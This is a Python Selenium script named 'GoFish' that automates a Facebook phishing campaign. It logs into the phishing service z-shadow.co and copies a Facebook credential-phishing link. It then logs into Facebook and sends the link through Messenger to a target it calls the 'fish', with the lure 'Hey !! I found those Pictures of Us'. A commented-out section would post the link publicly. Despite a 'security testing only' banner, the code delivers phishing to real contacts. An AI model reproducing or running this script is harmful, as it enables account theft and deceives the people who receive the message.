from selenium import webdriver
from selenium.webdriver.common.keys import Keys
from selenium.webdriver import ActionChains
import time

driver=webdriver.Chrome('C:/Users/R00ft0p/Documents/GoFish/chromedriver_win32/chromedriver')
#actionChains = ActionChains(driver)
print("Welcome To GoFish")
time.sleep(1)
print("This Software is for Security Testing")
print("----------------------ONLY----------------------")
print("                                                  .-')    ('-. .-. ")
print("                                                 ( 00 ). ( 00 )  / ")
print("  ,----.    .-'),-----.          ,------.,-.-') (_)---\_),--. ,--. ")
print(" '  .-./-')( 00'  .-.  '      ('-| _.---'|  |00)/    _ | |  | |  | ")
print(" |  |_( 00 )   |  | |  |      (00|(_|    |  |  |\  :` `. |   .|  | ")
print(" |  | .--, \_) |  |\|  |      /  |  '--. |  |(_/ '\.`''.)|       | ")
print("(|  | '. (_/ \ |  | |  |      \_)|  .--',|  |_.'.-._)   \|  .-.  | ")
print(" |  '--'  |   `'  '-'  '        \|  |_)(_|  |   \       /|  | |  | ")
print("  `------'      `-----'          `--'    `--'    `-----' `--' `--' ")
time.sleep(1)
print("-------------------------------------")
print(" )\ )    )    ) (       )    )       ") 
print("(()/( ( /( ( /( )\ ) ( /( ( /(       ")
print(" /(_)))\()))\()|()/( )\()))\())`  )  ") 
print("(_)) ((_)\((_)\ /(_)|_))/((_)\ /(/(  ") 
print("| _ \/  (_)  (_|_) _| |_ /  (_|(_)_\ ") 
print("|   / () | () | |  _|  _| () || '_ \)") 
print("|_|_\ __/ \__/  |_|  \__|\__/ | .__/ ") 
print("                              |_|    ") 
print("-------------------------------------")

print("Written By:Andrew Lozano aka R00ft0p")
print("Entering z-shadow")
driver.get('http://z-shadow.co/')
print("Loading Page")
time.sleep(4)
print("Page Loaded")
print("You must enter your password and user name")
time.sleep(1)
print("In both sections of GoFish")
print("use any editor to add credentials")
print("register with z-shadow.co")
time.sleep(1)
print("register with Facebook.com")
#---------------------------------------------------------------
user=driver.find_element_by_css_selector('#user_name')
user.send_keys('')# Your user name
time.sleep(1)
password=driver.find_element_by_css_selector('#user_pass')
password.send_keys('')# Your password
#---------------------------------------------------------------
time.sleep(4)
password.send_keys(Keys.ENTER)
print("we are In!!")
print("Loading Content")
time.sleep(7)
print("Selecting English fbGoFishlink Button")
fblink=driver.find_element_by_xpath('//*[@id="scama_table"]/tbody/tr[1]/td[4]/span[1]')
fblink.click()
time.sleep(1)
print("Selecting English Link")
fbFishlink = driver.find_element_by_css_selector('#scama_table > tbody > tr:nth-child(1) > td:nth-child(4) > div > div.popover-content > div > input')
fbFishlink.click()
print("Selected fbGoFishlink")
fbFishlink.send_keys(Keys.CONTROL+"c")
time.sleep(1)
print("Switching to Facebook.com")
print("Use Editor To Change Credentials")
print("On Lines 38 & 40")
driver.get('https://facebook.com')
time.sleep(4)
#-------------------------------------------------------------------------------------
user=driver.find_element_by_css_selector('#email') 
user.send_keys('') # Enter email or preffered Login Id
password=driver.find_element_by_css_selector('#pass')
password.send_keys('') # Enter Password
#-------------------------------------------------------------------------------------
login=driver.find_element_by_css_selector('#loginbutton')
login.click()
time.sleep(2)
print("We are In!!")
time.sleep(1)
print("Entering fbMessenger")
driver.get('https://www.facebook.com/messages')
time.sleep(4)

print("Sending Link to First Fish")
time.sleep(1)
victimNum1=driver.find_element_by_css_selector('#js_d')#//*[@id=""] , //*[@id="js_d"]/div/div/div
#victimNum1.click()


#print("Exception found",format(e))
time.sleep(1)
victimNum1.send_keys('Hey !! I found those Pictures of Us')
victimNum1.send_keys(Keys.CONTROL+"v")
time.sleep(1)
victimNum1.send_keys(Keys.ENTER)
print("   .-')  ") 
print(" _(  OO) ") 
print("(,------.") 
print(" '------'")
print("  ( )    ")
time.sleep(2)
print("    ( )  ")
print("     ( ) ")
print("      ( )")
print("     ( ) ")
print("    ()   ")          
print("   ()    ")         
print("  ()     ")          
print(" ()      ")
time.sleep(1)
print("  ()     ")
print("   ()    ")
print("    ()   ")
print("     ( ) ")
print("      ( )")
print("     ( ) ")
print("    ( )  ")
print("  ( )    ")
print("  ( )    ")
time.sleep(1)
print("    ( )  ")
print("     ( ) ")
print("      ( )")
print("     ( ) ")
print("    ()   ")          
print("   ()    ")         
print("  ()     ")          
print(" ()      ")
time.sleep(1)
print("  ()     ")
print("   ()    ")
print("    ()   ")
print("     ( ) ")
print("      ( )")
print("     ( ) ")
print("    ( )  ")
print("  ( )    ")
print("  ( )    ")
time.sleep(1)
print("    ( )  ")
print("     ( ) ")
print("      ( )")
print("     ( ) ")
print("    ()   ")          
print("   ()    ")         
print("  ()     ")          
print(" ()      ")
time.sleep(1)
print("  ()     ")
print("   ()    ")
print("    ()   ")
print("     ( ) ")
print("      ( )")
print("     ( ) ")
print("    ( )  ")
print("  ( )    ")
print("  (`-.   ") 
print(" (00  )_ ") 
print(",------.)") 
print("`------' ") 

print("Sent Link To Fish")
#driver.get('https://www.facebook.com')
#time.sleep(1)
#status=driver.find_element_by_xpath("//textarea[@name='xhpc_message']")
#status.send_keys(Keys.CONTROL+"v");
#print("Status Attempt")
#time.sleep(4)
#postbutton = driver.find_element_by_id("button")
#postbutton.click()
#print("posted link as status!")



#ids = driver.find_elements_by_xpath('//*[@id="js_d"]/div/div/div')
#for ii in ids:
# 	print(ii.get_attribute('//*[@id="js_d"]/div/div/div'))
